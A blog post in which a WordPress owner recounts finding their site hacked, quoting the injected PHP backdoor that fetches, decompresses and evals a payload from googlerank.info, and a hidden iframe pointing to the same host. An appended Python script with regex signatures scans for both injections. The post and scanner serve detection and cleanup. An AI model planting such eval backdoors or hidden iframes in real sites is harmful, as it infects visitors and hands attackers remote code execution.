I wuz hacked

Some time recently (at least I hope it was recently) someone has hacked this blog. It was very subtle and I only discovered when a friend said that she could no longer get to even my home page. She uses McAfee security system and got the message

googlerank.info/counter may cause a breach of browser security.

*Why were you redirected to this page?* When we tested, this site attempted to make unauthorized changes to our test PC by exploiting a browser security vulnerability. This is a serious security threat which could lead to an infection of your PC.

The McAfee information page had more details. I had a hunt around and couldn’t see any mention of this googlerank.info site, nor any iframes, and was beginning to think it was a false alarm. But looking at the page source of the front blog page via the view menu in Firefox, I spotted a small line of code apparently advertising a DVD download site. I can’t show it to you now because I forgot to save a copy, but it was rather odd. It was designed not to display (using CSS), so it must have been there only for the search engine linking credit; also, it made no mention of the googlerank.info site. It was just before the footer code and didn’t appear on any other blog pages, so I was drawn to my theme index.php page and, sure enough, between <?php get_sidebar(); ?> and <?php get_footer(); ?> was the offending line of code. Checking over the rest of the file I found another piece immediately after the initial <?php which did mention the offending googlerank.info site. It was as follows:

// Only runs when a 'pird' cookie or a ?pird= query parameter is present, so ordinary visitors never trigger it.
if (isset($_COOKIE['pird']) or isset($_GET['pird'])) {
    // Plants the cookie for about 600 days so later visits trigger it without the parameter.
    if (!isset($_COOKIE['pird'])) setcookie('pird', '12313.412',time()+60*60*24*600);
    // Fetches a compressed file from the remote host, decompresses it and runs it as PHP.
    eval(gzuncompress(file_get_contents('http://googlerank.info/soft/faq.compressed')));
    // Stops here, so the normal blog page is never rendered for that request.
    exit;
}

I am not exactly sure what it does; the referenced file seems to be missing, but I have chopped the code out now. A Google search doesn’t come up with any hits for this type of hack.

What is worrying is that I don’t know how they got in. I had a good admin password, which I have now changed for an even better one. I should also refresh the theme code from source in case there are other changes that I haven’t seen. I will need to look seriously at updating to the latest WordPress version, or perhaps the problem is file permissions? Or is my hosting service compromised? Also, do I need to tell some database somewhere that I am safe again? McAfee seems to have already white-listed me. I can see that there is no point in these security companies telling deliberately malicious sites that they are blacklisted, but it would be useful for those of us who have been unknowingly hacked.

As a result I have a lot more respect for McAfee than I did before. I see they also know that the site is hosted in Canada.

Update: Looking around I found that the main site index.htm was also modified. It had the well known line

<iframe src=http://googlerank.info/counter style=display:none></iframe>

so this is probably what McAfee was seeing. What I still don’t know is how it was done. None of the file or directory protections are bad, and the date on the attacked files is the same as the original. I have now refreshed everything so it should be clean, but if you don’t know how it was done then it remains a concern.
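An added example, not from the original post or from WordPress: a small Python check for the two injections described above (the eval’d remote payload in the theme index.php and the hidden iframe in index.htm), plus a byte-for-byte comparison of the installed files against a clean copy, because the attacked files kept their original dates and so file timestamps cannot be trusted. The sample files and the example.invalid URLs are constructed; gzinflate and base64_decode are assumed variants of the gzuncompress wrapper and are not from the post.

```python
import re
import tempfile
from pathlib import Path

# Signatures for the two injections the post describes: a remote payload fetched with
# file_get_contents(), decompressed and eval()'d, and an iframe hidden with display:none.
# gzinflate/base64_decode are assumed siblings of gzuncompress (not from the post).
PATTERNS = {
    "remote_eval": re.compile(
        r"eval\s*\(\s*(?:gzuncompress|gzinflate|base64_decode)\s*\("
        r"\s*file_get_contents\s*\(\s*['\"]https?://"),
    "hidden_iframe": re.compile(r"<iframe\b[^>]*display\s*:\s*none", re.I),
}

def scan_file(path):
    """Names of every signature that matches the file's contents."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

def changed_files(installed, clean):
    """Relative paths under `installed` that differ from, or are missing in, the clean
    copy. Dates are ignored on purpose: the attacked files kept their original mtime."""
    installed, clean = Path(installed), Path(clean)
    changed = []
    for full in installed.rglob("*"):
        if full.is_file():
            rel = full.relative_to(installed)
            ref = clean / rel
            if not ref.is_file() or full.read_bytes() != ref.read_bytes():
                changed.append(str(rel))
    return sorted(changed)

# Constructed sample (not real files): a clean theme index.php, an infected copy carrying
# an injection shaped like the post's (placeholder URL), and a hidden-iframe index.htm.
CLEAN_INDEX = "<?php get_header(); ?>\n<?php get_sidebar(); ?>\n<?php get_footer(); ?>\n"
INJECTION = ("<?php if (isset($_COOKIE['pird']) or isset($_GET['pird'])) {\n"
             "eval(gzuncompress(file_get_contents('http://example.invalid/faq.compressed')));\n"
             "exit; } ?>\n")
IFRAME_PAGE = "<html><iframe src=http://example.invalid/counter style=display:none></iframe></html>\n"

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        clean.mkdir(); live.mkdir()
        (clean / "index.php").write_text(CLEAN_INDEX)
        (live / "index.php").write_text(INJECTION + CLEAN_INDEX)
        (live / "index.htm").write_text(IFRAME_PAGE)
        return {"changed": changed_files(live, clean),
                "index.php": scan_file(live / "index.php"),
                "index.htm": scan_file(live / "index.htm")}
```

Running demo() reports index.php and index.htm as differing from the clean copy, flags the theme file for the remote eval and the front page for the hidden iframe, and finds nothing in the clean index.php.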

Update 2: Mtekk’s Crib seems to have found a similar problem.

Update 3: Creative Briefing has experienced a similar problem using WordPress version 2.3.3 (the current one at 13-Mar-2008). This is very worrying.
